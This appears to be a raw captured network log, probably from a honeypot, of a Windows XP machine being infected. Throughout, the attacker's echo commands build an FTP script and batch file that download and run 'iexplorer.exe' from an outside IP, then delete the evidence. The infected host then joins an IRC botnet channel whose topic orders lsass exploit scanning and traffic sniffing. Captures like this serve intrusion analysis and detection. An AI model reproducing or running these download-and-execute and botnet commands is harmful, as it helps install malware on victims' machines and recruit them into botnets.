Client: echo open 85.179.166.148 17323>.pif C:\\\\WINDOWS\\\\system32>


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	echo open 85.179.166.148 17323>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo user a a>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo binary>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo bye>>.pif C:\\WINDOWS\\system32> 
VICTIM:  	echo @echo off >c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo iexplorer.exe >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del .pif >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo del /F c.bat >>c.batC:\\WINDOWS\\system32> 
VICTIM:  	echo exit /y >>c.batC:\\WINDOWS\\system32> 
ATTACKER:	220  
VICTIM:  	USER a 
ATTACKER:	331  
VICTIM:  	PASS a 
ATTACKER:	230  
VICTIM:  	TYPE I 
ATTACKER:	200  
VICTIM:  	PORT 192,168,1,148,4 
ATTACKER:	200  
ATTACKER:	RETR iexplorer.exe 
ATTACKER:	150  
ATTACKER:	226  
VICTIM:  	QUIT 
ATTACKER:	221  
VICTIM:  	NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir 
ATTACKER:	:irc.priv8net.com NOTICE AUTH :*** Looking up your hostname... 
ATTACKER:	:irc.priv8net.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead:irc.priv8net.com 001 `tkhjqhir :irc.priv8net.com 002 `tkhjqhir :               M0dded by uNkn0wn Crew             :irc.priv8net.com 003 `tkhjqhir :irc.priv8net.com 004 `tkhjqhir :          www.uNkn0wn.eu - iD@uNkn0wn.eu          :irc.priv8net.com 005 `tkhjqhir :irc.priv8net.com 005 `tkhjqhir :irc.priv8net.com 005 `tkhjqhir :irc.priv8net.com 422 `tkhjqhir :MOTD File is missing:irc.priv8net.com 455 `tkhjqhir :Your username `tkhjqhir contained the invalid character(s) ` and has been changed to tkhjqhir. Please use only the characters 0-9 a-z A-Z _ - or . in your username. Your username is the part before the @ in your email address.:`tkhjqhir MODE `tkhjqhir :+iwxG 
VICTIM:  	JOIN #.has hs 
VICTIM:  	USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhir 
ATTACKER:	:`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN :#.has:irc.priv8net.com 332 `tkhjqhir #.has :.join #.s |`adv.start lsass 100 5 0 -r -b |`sniff.on -s:irc.priv8net.com 333 `tkhjqhir #.has dc 1252165482 
ATTACKER:	:irc.priv8net.com 302 `tkhjqhir :`tkhjqhir=+~tkhjqhir@192.168.1.148    :irc.priv8net.com 302 `tkhjqhir :`tkhjqhir=+~tkhjqhir@192.168.1.148    :irc.priv8net.com 302 `tkhjqhir :`tkhjqhir=+~tkhjqhir@192.168.1.148    :irc.priv8net.com 302 `tkhjqhir :`tkhjqhir=+~tkhjqhir@192.168.1.148     
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs 
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs 
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs 
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs 
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs 
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs 
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs 
ATTACKER:	PING :irc.priv8net.com 
ATTACKER:	PONG :irc.priv8net.com 
VICTIM:  	JOIN #.has hs